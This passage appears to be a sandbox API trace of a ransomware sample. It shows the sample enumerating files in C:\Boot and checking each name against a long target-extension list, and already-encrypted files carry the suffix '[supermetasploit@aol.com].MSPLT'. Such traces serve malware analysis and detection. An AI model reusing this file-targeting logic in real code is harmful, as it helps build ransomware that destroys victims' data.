ftLastWriteTime.dwHighDateTime=0x1d6097d, nFileSizeHigh=0x0, nFileSizeLow=0x59b2fc, dwReserved0=0xe84, dwReserved1=0xffffcb96, cFileName="Windows6.1-KB958488-v6001-x64.msu.id-B4197730.[supermetasploit@aol.com].MSPLT", cAlternateFileName="WINDOW~3.MSP")) returned 1 [0284.384] FindNextFileW (in: hFindFile=0x48a130, lpFindFileData=0x385fa7c | out: lpFindFileData=0x385fa7c*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xd0ac5d00, ftCreationTime.dwHighDateTime=0x1cac6ce, ftLastAccessTime.dwLowDateTime=0xd0ac5d00, ftLastAccessTime.dwHighDateTime=0x1cac6ce, ftLastWriteTime.dwLowDateTime=0x649b7104, ftLastWriteTime.dwHighDateTime=0x1d6097d, nFileSizeHigh=0x0, nFileSizeLow=0x2cae27, dwReserved0=0xe84, dwReserved1=0xffffcb96, cFileName="Windows6.1-KB958488-v6001-x86.msu.id-B4197730.[supermetasploit@aol.com].MSPLT", cAlternateFileName="WINDOW~4.MSP")) returned 1 [0284.384] FindNextFileW (in: hFindFile=0x48a130, lpFindFileData=0x385fa7c | out: lpFindFileData=0x385fa7c*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xd0ac5d00, ftCreationTime.dwHighDateTime=0x1cac6ce, ftLastAccessTime.dwLowDateTime=0xd0ac5d00, ftLastAccessTime.dwHighDateTime=0x1cac6ce, ftLastWriteTime.dwLowDateTime=0x649b7104, ftLastWriteTime.dwHighDateTime=0x1d6097d, nFileSizeHigh=0x0, nFileSizeLow=0x2cae27, dwReserved0=0xe84, dwReserved1=0xffffcb96, cFileName="Windows6.1-KB958488-v6001-x86.msu.id-B4197730.[supermetasploit@aol.com].MSPLT", cAlternateFileName="WINDOW~4.MSP")) returned 0 [0284.384] FindClose (in: hFindFile=0x48a130 | out: hFindFile=0x48a130) returned 1 [0284.385] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x3ff0728 | out: hHeap=0x470000) returned 1 [0284.385] FindNextFileW (in: hFindFile=0x48a170, lpFindFileData=0x385fcf8 | out: lpFindFileData=0x385fcf8*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xc47952ba, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef6fa258, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xef6fa258, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x77b20000, dwReserved1=0x0, cFileName="Boot", cAlternateFileName="")) returned 1 [0284.385] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0xfffe) returned 0x3ff0728 [0284.385] FindFirstFileW (in: lpFileName="C:\\Boot\\*", lpFindFileData=0x385fa7c | out: lpFindFileData=0x385fa7c*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xc47952ba, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef9d311c, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xef9d311c, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xe84, dwReserved1=0xffffcb96, cFileName=".", cAlternateFileName="")) returned 0x3947e28 [0284.386] FindNextFileW (in: hFindFile=0x3947e28, lpFindFileData=0x385fa7c | out: lpFindFileData=0x385fa7c*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xc47952ba, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef9d311c, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xef9d311c, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xe84, dwReserved1=0xffffcb96, cFileName="..", cAlternateFileName="")) returned 1 [0284.448] FindNextFileW (in: hFindFile=0x3947e28, lpFindFileData=0x385fa7c | out: lpFindFileData=0x385fa7c*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0xc4c800b6, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0x6d72d3cf, ftLastAccessTime.dwHighDateTime=0x1d5e877, ftLastWriteTime.dwLowDateTime=0x6d72d3cf, ftLastWriteTime.dwHighDateTime=0x1d5e877, nFileSizeHigh=0x0, nFileSizeLow=0xb000, dwReserved0=0xe84, dwReserved1=0xffffcb96, cFileName="BCD", cAlternateFileName="")) returned 1 [0284.456] FindNextFileW (in: hFindFile=0x3947e28, lpFindFileData=0x385fa7c | out: lpFindFileData=0x385fa7c*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0xc4c800b6, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc4c800b6, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0xc4c800b6, ftLastWriteTime.dwHighDateTime=0x1d32764, nFileSizeHigh=0x0, nFileSizeLow=0x10000, dwReserved0=0xe84, dwReserved1=0xffffcb96, cFileName="BCD.LOG", cAlternateFileName="")) returned 1 [0284.456] lstrlenW (lpString="BCD.LOG") returned 7 [0284.456] lstrlenW (lpString=".1cd") returned 4 [0284.456] lstrcmpiW (lpString1=".1cd", lpString2=".LOG") returned -1 [0284.456] lstrlenW (lpString=".3ds") returned 4 [0284.456] lstrcmpiW (lpString1=".3ds", lpString2=".LOG") returned -1 [0284.457] lstrlenW (lpString=".3fr") returned 4 [0284.457] lstrcmpiW (lpString1=".3fr", lpString2=".LOG") returned -1 [0284.457] lstrlenW (lpString=".3g2") returned 4 [0284.461] lstrcmpiW (lpString1=".3g2", lpString2=".LOG") returned -1 [0284.461] lstrlenW (lpString=".3gp") returned 4 [0284.461] lstrcmpiW (lpString1=".3gp", lpString2=".LOG") returned -1 [0284.461] lstrlenW (lpString=".7z") returned 3 [0284.461] lstrcmpiW (lpString1=".7z", lpString2="LOG") returned -1 [0284.461] lstrlenW (lpString=".accda") returned 6 [0284.461] lstrcmpiW (lpString1=".accda", lpString2="CD.LOG") returned -1 [0284.461] lstrlenW (lpString=".accdb") returned 6 [0284.461] lstrcmpiW (lpString1=".accdb", lpString2="CD.LOG") returned -1 [0284.461] lstrlenW (lpString=".accdc") returned 6 [0284.461] lstrcmpiW (lpString1=".accdc", lpString2="CD.LOG") returned -1 [0284.461] lstrlenW (lpString=".accde") returned 6 [0284.462] lstrcmpiW (lpString1=".accde", lpString2="CD.LOG") returned -1 [0284.462] lstrlenW (lpString=".accdt") returned 6 [0284.462] lstrcmpiW (lpString1=".accdt", lpString2="CD.LOG") returned -1 [0284.462] lstrlenW (lpString=".accdw") returned 6 [0284.462] lstrcmpiW (lpString1=".accdw", lpString2="CD.LOG") returned -1 [0284.462] lstrlenW (lpString=".adb") returned 4 [0284.462] lstrcmpiW (lpString1=".adb", lpString2=".LOG") returned -1 [0284.462] lstrlenW (lpString=".adp") returned 4 [0284.462] lstrcmpiW (lpString1=".adp", lpString2=".LOG") returned -1 [0284.462] lstrlenW (lpString=".ai") returned 3 [0284.462] lstrcmpiW (lpString1=".ai", lpString2="LOG") returned -1 [0284.462] lstrlenW (lpString=".ai3") returned 4 [0284.462] lstrcmpiW (lpString1=".ai3", lpString2=".LOG") returned -1 [0284.462] lstrlenW (lpString=".ai4") returned 4 [0284.462] lstrcmpiW (lpString1=".ai4", lpString2=".LOG") returned -1 [0284.462] lstrlenW (lpString=".ai5") returned 4 [0284.462] lstrcmpiW (lpString1=".ai5", lpString2=".LOG") returned -1 [0284.462] lstrlenW (lpString=".ai6") returned 4 [0284.462] lstrcmpiW (lpString1=".ai6", lpString2=".LOG") returned -1 [0284.462] lstrlenW (lpString=".ai7") returned 4 [0284.462] lstrcmpiW (lpString1=".ai7", lpString2=".LOG") returned -1 [0284.462] lstrlenW (lpString=".ai8") returned 4 [0284.462] lstrcmpiW (lpString1=".ai8", lpString2=".LOG") returned -1 [0284.462] lstrlenW (lpString=".anim") returned 5 [0284.463] lstrcmpiW (lpString1=".anim", lpString2="D.LOG") returned -1 [0284.463] lstrlenW (lpString=".arw") returned 4 [0284.463] lstrcmpiW (lpString1=".arw", lpString2=".LOG") returned -1 [0284.463] lstrlenW (lpString=".as") returned 3 [0284.463] lstrcmpiW (lpString1=".as", lpString2="LOG") returned -1 [0284.463] lstrlenW (lpString=".asa") returned 4 [0284.463] lstrcmpiW (lpString1=".asa", lpString2=".LOG") returned -1 [0284.463] lstrlenW (lpString=".asc") returned 4 [0284.463] lstrcmpiW (lpString1=".asc", lpString2=".LOG") returned -1 [0284.463] lstrlenW (lpString=".ascx") returned 5 [0284.463] lstrcmpiW (lpString1=".ascx", lpString2="D.LOG") returned -1 [0284.463] lstrlenW (lpString=".asm") returned 4 [0284.463] lstrcmpiW (lpString1=".asm", lpString2=".LOG") returned -1 [0284.463] lstrlenW (lpString=".asmx") returned 5 [0284.463] lstrcmpiW (lpString1=".asmx", lpString2="D.LOG") returned -1 [0284.463] lstrlenW (lpString=".asp") returned 4 [0284.463] lstrcmpiW (lpString1=".asp", lpString2=".LOG") returned -1 [0284.463] lstrlenW (lpString=".aspx") returned 5 [0284.463] lstrcmpiW (lpString1=".aspx", lpString2="D.LOG") returned -1 [0284.463] lstrlenW (lpString=".asr") returned 4 [0284.463] lstrcmpiW (lpString1=".asr", lpString2=".LOG") returned -1 [0284.463] lstrlenW (lpString=".asx") returned 4 [0284.463] lstrcmpiW (lpString1=".asx", lpString2=".LOG") returned -1 [0284.463] lstrlenW (lpString=".avi") returned 4 [0284.463] lstrcmpiW (lpString1=".avi", lpString2=".LOG") returned -1 [0284.463] lstrlenW (lpString=".avs") returned 4 [0284.464] lstrcmpiW (lpString1=".avs", lpString2=".LOG") returned -1 [0284.464] lstrlenW (lpString=".backup") returned 7 [0284.464] lstrcmpiW (lpString1=".backup", lpString2="BCD.LOG") returned -1 [0284.464] lstrlenW (lpString=".bak") returned 4 [0284.464] lstrcmpiW (lpString1=".bak", lpString2=".LOG") returned -1 [0284.464] lstrlenW (lpString=".bay") returned 4 [0284.464] lstrcmpiW (lpString1=".bay", lpString2=".LOG") returned -1 [0284.464] lstrlenW (lpString=".bd") returned 3 [0284.464] lstrcmpiW (lpString1=".bd", lpString2="LOG") returned -1 [0284.464] lstrlenW (lpString=".bin") returned 4 [0284.464] lstrcmpiW (lpString1=".bin", lpString2=".LOG") returned -1 [0284.464] lstrlenW (lpString=".bmp") returned 4 [0284.464] lstrcmpiW (lpString1=".bmp", lpString2=".LOG") returned -1 [0284.464] lstrlenW (lpString=".bz2") returned 4 [0284.464] lstrcmpiW (lpString1=".bz2", lpString2=".LOG") returned -1 [0284.464] lstrlenW (lpString=".c") returned 2 [0284.464] lstrcmpiW (lpString1=".c", lpString2="OG") returned -1 [0284.464] lstrlenW (lpString=".cdr") returned 4 [0284.464] lstrcmpiW (lpString1=".cdr", lpString2=".LOG") returned -1 [0284.464] lstrlenW (lpString=".cer") returned 4 [0284.464] lstrcmpiW (lpString1=".cer", lpString2=".LOG") returned -1 [0284.464] lstrlenW (lpString=".cf") returned 3 [0284.464] lstrcmpiW (lpString1=".cf", lpString2="LOG") returned -1 [0284.464] lstrlenW (lpString=".cfc") returned 4 [0284.464] lstrcmpiW (lpString1=".cfc", lpString2=".LOG") returned -1 [0284.464] lstrlenW (lpString=".cfm") returned 4 [0284.464] lstrcmpiW (lpString1=".cfm", lpString2=".LOG") returned -1 [0284.465] lstrlenW (lpString=".cfml") returned 5 [0284.465] lstrcmpiW (lpString1=".cfml", lpString2="D.LOG") returned -1 [0284.465] lstrlenW (lpString=".cfu") returned 4 [0284.465] lstrcmpiW (lpString1=".cfu", lpString2=".LOG") returned -1 [0284.465] lstrlenW (lpString=".chm") returned 4 [0284.465] lstrcmpiW (lpString1=".chm", lpString2=".LOG") returned -1 [0284.465] lstrlenW (lpString=".cin") returned 4 [0284.465] lstrcmpiW (lpString1=".cin", lpString2=".LOG") returned -1 [0284.465] lstrlenW (lpString=".class") returned 6 [0284.465] lstrcmpiW (lpString1=".class", lpString2="CD.LOG") returned -1 [0284.465] lstrlenW (lpString=".clx") returned 4 [0284.465] lstrcmpiW (lpString1=".clx", lpString2=".LOG") returned -1 [0284.465] lstrlenW (lpString=".config") returned 7 [0284.465] lstrcmpiW (lpString1=".config", lpString2="BCD.LOG") returned -1 [0284.465] lstrlenW (lpString=".cpp") returned 4 [0284.465] lstrcmpiW (lpString1=".cpp", lpString2=".LOG") returned -1 [0284.465] lstrlenW (lpString=".cr2") returned 4 [0284.465] lstrcmpiW (lpString1=".cr2", lpString2=".LOG") returned -1 [0284.465] lstrlenW (lpString=".crt") returned 4 [0284.465] lstrcmpiW (lpString1=".crt", lpString2=".LOG") returned -1 [0284.465] lstrlenW (lpString=".crw") returned 4 [0284.465] lstrcmpiW (lpString1=".crw", lpString2=".LOG") returned -1 [0284.465] lstrlenW (lpString=".cs") returned 3 [0284.466] lstrcmpiW (lpString1=".cs", lpString2="LOG") returned -1 [0284.466] lstrlenW (lpString=".css") returned 4 [0284.466] lstrcmpiW (lpString1=".css", lpString2=".LOG") returned -1 [0284.466] lstrlenW (lpString=".csv") returned 4 [0284.466] lstrcmpiW (lpString1=".csv", lpString2=".LOG") returned -1 [0284.466] lstrlenW (lpString=".cub") returned 4 [0284.466] lstrcmpiW (lpString1=".cub", lpString2=".LOG") returned -1 [0284.466] lstrlenW (lpString=".dae") returned 4 [0284.466] lstrcmpiW (lpString1=".dae", lpString2=".LOG") returned -1 [0284.466] lstrlenW (lpString=".dat") returned 4 [0284.466] lstrcmpiW (lpString1=".dat", lpString2=".LOG") returned -1 [0284.466] lstrlenW (lpString=".db") returned 3 [0284.466] lstrcmpiW (lpString1=".db", lpString2="LOG") returned -1 [0284.466] lstrlenW (lpString=".dbf") returned 4 [0284.466] lstrcmpiW (lpString1=".dbf", lpString2=".LOG") returned -1 [0284.467] lstrlenW (lpString=".dbx") returned 4 [0284.467] lstrcmpiW (lpString1=".dbx", lpString2=".LOG") returned -1 [0284.467] lstrlenW (lpString=".dc3") returned 4 [0284.467] lstrcmpiW (lpString1=".dc3", lpString2=".LOG") returned -1 [0284.467] lstrlenW (lpString=".dcm") returned 4 [0284.467] lstrcmpiW (lpString1=".dcm", lpString2=".LOG") returned -1 [0284.467] lstrlenW (lpString=".dcr") returned 4 [0284.467] lstrcmpiW (lpString1=".dcr", lpString2=".LOG") returned -1 [0284.467] lstrlenW (lpString=".der") returned 4 [0284.467] lstrcmpiW (lpString1=".der", lpString2=".LOG") returned -1 [0284.467] lstrlenW (lpString=".dib") returned 4 [0284.467] lstrcmpiW (lpString1=".dib", lpString2=".LOG") returned -1 [0284.467] lstrlenW (lpString=".dic") returned 4 [0284.467] lstrcmpiW (lpString1=".dic", lpString2=".LOG") returned -1 [0284.467] lstrlenW (lpString=".dif") returned 4 [0284.467] lstrcmpiW (lpString1=".dif", lpString2=".LOG") returned -1 [0284.467] lstrlenW (lpString=".divx") returned 5 [0284.467] lstrcmpiW (lpString1=".divx", lpString2="D.LOG") returned -1 [0284.468] lstrlenW (lpString=".djvu") returned 5 [0284.468] lstrcmpiW (lpString1=".djvu", lpString2="D.LOG") returned -1 [0284.468] lstrlenW (lpString=".dng") returned 4 [0284.468] lstrcmpiW (lpString1=".dng", lpString2=".LOG") returned -1 [0284.468] lstrlenW (lpString=".doc") returned 4 [0284.468] lstrcmpiW (lpString1=".doc", lpString2=".LOG") returned -1 [0284.468] lstrlenW (lpString=".docm") returned 5 [0284.468] lstrcmpiW (lpString1=".docm", lpString2="D.LOG") returned -1 [0284.468] lstrlenW (lpString=".docx") returned 5 [0284.468] lstrcmpiW (lpString1=".docx", lpString2="D.LOG") returned -1 [0284.468] lstrlenW (lpString=".dot") returned 4 [0284.468] lstrcmpiW (lpString1=".dot", lpString2=".LOG") returned -1 [0284.468] lstrlenW (lpString=".dotm") returned 5 [0284.468] lstrcmpiW (lpString1=".dotm", lpString2="D.LOG") returned -1 [0284.468] lstrlenW (lpString=".dotx") returned 5 [0284.468] lstrcmpiW (lpString1=".dotx", lpString2="D.LOG") returned -1 [0284.468] lstrlenW (lpString=".dpx") returned 4 [0284.468] lstrcmpiW (lpString1=".dpx", lpString2=".LOG") returned -1 [0284.468] lstrlenW (lpString=".dqy") returned 4 [0284.468] lstrcmpiW (lpString1=".dqy", lpString2=".LOG") returned -1 [0284.468] lstrlenW (lpString=".dsn") returned 4 [0284.469] lstrcmpiW (lpString1=".dsn", lpString2=".LOG") returned -1 [0284.469] lstrlenW (lpString=".dt") returned 3 [0284.469] lstrcmpiW (lpString1=".dt", lpString2="LOG") returned -1 [0284.469] lstrlenW (lpString=".dtd") returned 4 [0284.469] lstrcmpiW (lpString1=".dtd", lpString2=".LOG") returned -1 [0284.469] lstrlenW (lpString=".dwg") returned 4 [0284.469] lstrcmpiW (lpString1=".dwg", lpString2=".LOG") returned -1 [0284.469] lstrlenW (lpString=".dwt") returned 4 [0284.469] lstrcmpiW (lpString1=".dwt", lpString2=".LOG") returned -1 [0284.469] lstrlenW (lpString=".dx") returned 3 [0284.469] lstrcmpiW (lpString1=".dx", lpString2="LOG") returned -1 [0284.469] lstrlenW (lpString=".dxf") returned 4 [0284.469] lstrcmpiW (lpString1=".dxf", lpString2=".LOG") returned -1 [0284.469] lstrlenW (lpString=".edml") returned 5 [0284.469] lstrcmpiW (lpString1=".edml", lpString2="D.LOG") returned -1 [0284.469] lstrlenW (lpString=".efd") returned 4 [0284.469] lstrcmpiW (lpString1=".efd", lpString2=".LOG") returned -1 [0284.469] lstrlenW (lpString=".elf") returned 4 [0284.469] lstrcmpiW (lpString1=".elf", lpString2=".LOG") returned -1 [0284.469] lstrlenW (lpString=".emf") returned 4 [0284.469] lstrcmpiW (lpString1=".emf", lpString2=".LOG") returned -1 [0284.469] lstrlenW (lpString=".emz") returned 4 [0284.469] lstrcmpiW (lpString1=".emz", lpString2=".LOG") returned -1 [0284.469] lstrlenW (lpString=".epf") returned 4 [0284.469] lstrcmpiW (lpString1=".epf", lpString2=".LOG") returned -1 [0284.469] lstrlenW (lpString=".eps") returned 4 [0284.469] lstrcmpiW (lpString1=".eps", lpString2=".LOG") returned -1 [0284.469] lstrlenW (lpString=".epsf") returned 5 [0284.469] lstrcmpiW (lpString1=".epsf", lpString2="D.LOG") returned -1 [0284.469] lstrlenW (lpString=".epsp") returned 5 [0284.470] lstrcmpiW (lpString1=".epsp", lpString2="D.LOG") returned -1 [0284.470] lstrlenW (lpString=".erf") returned 4 [0284.470] lstrcmpiW (lpString1=".erf", lpString2=".LOG") returned -1 [0284.470] lstrlenW (lpString=".exr") returned 4 [0284.470] lstrcmpiW (lpString1=".exr", lpString2=".LOG") returned -1 [0284.470] lstrlenW (lpString=".f4v") returned 4 [0284.470] lstrcmpiW (lpString1=".f4v", lpString2=".LOG") returned -1 [0284.470] lstrlenW (lpString=".fido") returned 5 [0284.470] lstrcmpiW (lpString1=".fido", lpString2="D.LOG") returned -1 [0284.470] lstrlenW (lpString=".flm") returned 4 [0284.470] lstrcmpiW (lpString1=".flm", lpString2=".LOG") returned -1 [0284.470] lstrlenW (lpString=".flv") returned 4 [0284.470] lstrcmpiW (lpString1=".flv", lpString2=".LOG") returned -1 [0284.470] lstrlenW (lpString=".frm") returned 4 [0284.470] lstrcmpiW (lpString1=".frm", lpString2=".LOG") returned -1 [0284.470] lstrlenW (lpString=".fxg") returned 4 [0284.470] lstrcmpiW (lpString1=".fxg", lpString2=".LOG") returned -1 [0284.470] lstrlenW (lpString=".geo") returned 4 [0284.470] lstrcmpiW (lpString1=".geo", lpString2=".LOG") returned -1 [0284.470] lstrlenW (lpString=".gif") returned 4 [0284.470] lstrcmpiW (lpString1=".gif", lpString2=".LOG") returned -1 [0284.470] lstrlenW (lpString=".grs") returned 4 [0284.470] lstrcmpiW (lpString1=".grs", lpString2=".LOG") returned -1 [0284.470] lstrlenW (lpString=".gz") returned 3 [0284.470] lstrcmpiW (lpString1=".gz", lpString2="LOG") returned -1 [0284.470] lstrlenW (lpString=".h") returned 2 [0284.470] lstrcmpiW (lpString1=".h", lpString2="OG") returned -1 [0284.471] lstrlenW (lpString=".hdr") returned 4 [0284.471] lstrcmpiW (lpString1=".hdr", lpString2=".LOG") returned -1 [0284.471] lstrlenW (lpString=".hpp") returned 4 [0284.471] lstrcmpiW (lpString1=".hpp", lpString2=".LOG") returned -1 [0284.471] lstrlenW (lpString=".hta") returned 4 [0284.471] lstrcmpiW (lpString1=".hta", lpString2=".LOG") returned -1 [0284.471] lstrlenW (lpString=".htc") returned 4 [0284.471] lstrcmpiW (lpString1=".htc", lpString2=".LOG") returned -1 [0284.471] lstrlenW (lpString=".htm") returned 4 [0284.471] lstrcmpiW (lpString1=".htm", lpString2=".LOG") returned -1 [0284.471] lstrlenW (lpString=".html") returned 5 [0284.471] lstrcmpiW (lpString1=".html", lpString2="D.LOG") returned -1 [0284.471] lstrlenW (lpString=".icb") returned 4 [0284.471] lstrcmpiW (lpString1=".icb", lpString2=".LOG") returned -1 [0284.471] lstrlenW (lpString=".ics") returned 4 [0284.471] lstrcmpiW (lpString1=".ics", lpString2=".LOG") returned -1 [0284.471] lstrlenW (lpString=".iff") returned 4 [0284.471] lstrcmpiW (lpString1=".iff", lpString2=".LOG") returned -1 [0284.471] lstrlenW (lpString=".inc") returned 4 [0284.471] lstrcmpiW (lpString1=".inc", lpString2=".LOG") returned -1 [0284.471] lstrlenW (lpString=".indd") returned 5 [0284.471] lstrcmpiW (lpString1=".indd", lpString2="D.LOG") returned -1 [0284.471] lstrlenW (lpString=".ini") returned 4 [0284.471] lstrcmpiW (lpString1=".ini", lpString2=".LOG") returned -1 [0284.471] lstrlenW (lpString=".iqy") returned 4 [0284.471] lstrcmpiW (lpString1=".iqy", lpString2=".LOG") returned -1 [0284.471] lstrlenW (lpString=".j2c") returned 4 [0284.471] lstrcmpiW (lpString1=".j2c", lpString2=".LOG") returned -1 [0284.471] lstrlenW (lpString=".j2k") returned 4 [0284.471] lstrcmpiW (lpString1=".j2k", lpString2=".LOG") returned -1 [0284.472] lstrlenW (lpString=".java") returned 5 [0284.472] lstrcmpiW (lpString1=".java", lpString2="D.LOG") returned -1 [0284.472] lstrlenW (lpString=".jp2") returned 4 [0284.472] lstrcmpiW (lpString1=".jp2", lpString2=".LOG") returned -1 [0284.472] lstrlenW (lpString=".jpc") returned 4 [0284.472] lstrcmpiW (lpString1=".jpc", lpString2=".LOG") returned -1 [0284.472] lstrlenW (lpString=".jpe") returned 4 [0284.472] lstrcmpiW (lpString1=".jpe", lpString2=".LOG") returned -1 [0284.472] lstrlenW (lpString=".jpeg") returned 5 [0284.472] lstrcmpiW (lpString1=".jpeg", lpString2="D.LOG") returned -1 [0284.472] lstrlenW (lpString=".jpf") returned 4 [0284.472] lstrcmpiW (lpString1=".jpf", lpString2=".LOG") returned -1 [0284.472] lstrlenW (lpString=".jpg") returned 4 [0284.472] lstrcmpiW (lpString1=".jpg", lpString2=".LOG") returned -1 [0284.472] lstrlenW (lpString=".jpx") returned 4 [0284.472] lstrcmpiW (lpString1=".jpx", lpString2=".LOG") returned -1 [0284.472] lstrlenW (lpString=".js") returned 3 [0284.472] lstrcmpiW (lpString1=".js", lpString2="LOG") returned -1 [0284.472] lstrlenW (lpString=".jsf") returned 4 [0284.472] lstrcmpiW (lpString1=".jsf", lpString2=".LOG") returned -1 [0284.472] lstrlenW (lpString=".json") returned 5 [0284.472] lstrcmpiW (lpString1=".json", lpString2="D.LOG") returned -1 [0284.472] lstrlenW (lpString=".jsp") returned 4 [0284.472] lstrcmpiW (lpString1=".jsp", lpString2=".LOG") returned -1 [0284.472] lstrlenW (lpString=".kdc") returned 4 [0284.472] lstrcmpiW (lpString1=".kdc", lpString2=".LOG") returned -1 [0284.472] lstrlenW (lpString=".kmz") returned 4 [0284.472] lstrcmpiW (lpString1=".kmz", lpString2=".LOG") returned -1 [0284.473] lstrlenW (lpString=".kwm") returned 4 [0284.473] lstrcmpiW (lpString1=".kwm", lpString2=".LOG") returned -1 [0284.473] lstrlenW (lpString=".lasso") returned 6 [0284.473] lstrcmpiW (lpString1=".lasso", lpString2="CD.LOG") returned -1 [0284.473] lstrlenW (lpString=".lbi") returned 4 [0284.473] lstrcmpiW (lpString1=".lbi", lpString2=".LOG") returned -1 [0284.473] lstrlenW (lpString=".lgf") returned 4 [0284.473] lstrcmpiW (lpString1=".lgf", lpString2=".LOG") returned -1 [0284.473] lstrlenW (lpString=".lgp") returned 4 [0284.473] lstrcmpiW (lpString1=".lgp", lpString2=".LOG") returned -1 [0284.473] lstrlenW (lpString=".log") returned 4 [0284.473] lstrcmpiW (lpString1=".log", lpString2=".LOG") returned 0 [0284.473] FindNextFileW (in: hFindFile=0x3947e28, lpFindFileData=0x385fa7c | out: lpFindFileData=0x385fa7c*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0xc4c800b6, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc4c800b6, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0xc4c800b6, ftLastWriteTime.dwHighDateTime=0x1d32764, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xe84, dwReserved1=0xffffcb96, cFileName="BCD.LOG1", cAlternateFileName="BCD~1.LOG")) returned 1 [0284.473] lstrlenW (lpString="BCD.LOG1") returned 8 [0284.473] lstrlenW (lpString=".1cd") returned 4 [0284.473] lstrcmpiW (lpString1=".1cd", lpString2="LOG1") returned -1 [0284.473] lstrlenW (lpString=".3ds") returned 4 [0284.473] lstrcmpiW (lpString1=".3ds", lpString2="LOG1") returned -1 [0284.473] lstrlenW (lpString=".3fr") returned 4 [0284.473] lstrcmpiW (lpString1=".3fr", lpString2="LOG1") returned -1 [0284.473] lstrlenW (lpString=".3g2") returned 4 [0284.473] lstrcmpiW (lpString1=".3g2", lpString2="LOG1") returned -1 [0284.473] lstrlenW (lpString=".3gp") returned 4 [0284.473] lstrcmpiW (lpString1=".3gp", lpString2="LOG1") returned -1 [0284.473] lstrlenW (lpString=".7z") returned 3 [0284.473] lstrcmpiW (lpString1=".7z", lpString2="OG1") returned -1 [0284.473] lstrlenW (lpString=".accda") returned 6 [0284.473] lstrcmpiW (lpString1=".accda", lpString2="D.LOG1") returned -1 [0284.473] lstrlenW (lpString=".accdb") returned 6 [0284.473] lstrcmpiW (lpString1=".accdb", lpString2="D.LOG1") returned -1 [0284.473] lstrlenW (lpString=".accdc") returned 6 [0284.473] lstrcmpiW (lpString1=".accdc", lpString2="D.LOG1") returned -1 [0284.474] lstrlenW (lpString=".accde") returned 6 [0284.474] lstrcmpiW (lpString1=".accde", lpString2="D.LOG1") returned -1 [0284.474] lstrlenW (lpString=".accdt") returned 6 [0284.474] lstrcmpiW (lpString1=".accdt", lpString2="D.LOG1") returned -1 [0284.474] lstrlenW (lpString=".accdw") returned 6 [0284.474] lstrcmpiW (lpString1=".accdw", lpString2="D.LOG1") returned -1 [0284.474] lstrlenW (lpString=".adb") returned 4 [0284.474] lstrcmpiW (lpString1=".adb", lpString2="LOG1") returned -1 [0284.474] lstrlenW (lpString=".adp") returned 4 [0284.474] lstrcmpiW (lpString1=".adp", lpString2="LOG1") returned -1 [0284.474] lstrlenW (lpString=".ai") returned 3 [0284.474] lstrcmpiW (lpString1=".ai", lpString2="OG1") returned -1 [0284.474] lstrlenW (lpString=".ai3") returned 4 [0284.474] lstrcmpiW (lpString1=".ai3", lpString2="LOG1") returned -1 [0284.474] lstrlenW (lpString=".ai4") returned 4 [0284.474] lstrcmpiW (lpString1=".ai4", lpString2="LOG1") returned -1 [0284.474] lstrlenW (lpString=".ai5") returned 4 [0284.474] lstrcmpiW (lpString1=".ai5", lpString2="LOG1") returned -1 [0284.474] lstrlenW (lpString=".ai6") returned 4 [0284.474] lstrcmpiW (lpString1=".ai6", lpString2="LOG1") returned -1 [0284.474] lstrlenW (lpString=".ai7") returned 4 [0284.474] lstrcmpiW (lpString1=".ai7", lpString2="LOG1") returned -1 [0284.474] lstrlenW (lpString=".ai8") returned 4 [0284.474] lstrcmpiW (lpString1=".ai8", lpString2="LOG1") returned -1 [0284.474] lstrlenW (lpString=".anim") returned 5 [0284.474] lstrcmpiW (lpString1=".anim", lpString2=".LOG1") returned -1 [0284.474] lstrlenW (lpString=".arw") returned 4 [0284.474] lstrcmpiW (lpString1=".arw", lpString2="LOG1") returned -1 [0284.474] lstrlenW (lpString=".as") returned 3 [0284.474] lstrcmpiW (lpString1=".as", lpString2="OG1") returned -1 [0284.474] lstrlenW (lpString=".asa") returned 4 [0284.474] lstrcmpiW (lpString1=".asa", lpString2="LOG1") returned -1 [0284.475] lstrlenW (lpString=".asc") returned 4 [0284.475] lstrcmpiW (lpString1=".asc", lpString2="LOG1") returned -1 [0284.475] lstrlenW (lpString=".ascx") returned 5 [0284.475] lstrcmpiW (lpString1=".ascx", lpString2=".LOG1") returned -1 [0284.475] lstrlenW (lpString=".asm") returned 4 [0284.475] lstrcmpiW (lpString1=".asm", lpString2="LOG1") returned -1 [0284.475] lstrlenW (lpString=".asmx") returned 5 [0284.475] lstrcmpiW (lpString1=".asmx", lpString2=".LOG1") returned -1 [0284.475] lstrlenW (lpString=".asp") returned 4 [0284.475] lstrcmpiW (lpString1=".asp", lpString2="LOG1") returned -1 [0284.475] lstrlenW (lpString=".aspx") returned 5 [0284.475] lstrcmpiW (lpString1=".aspx", lpString2=".LOG1") 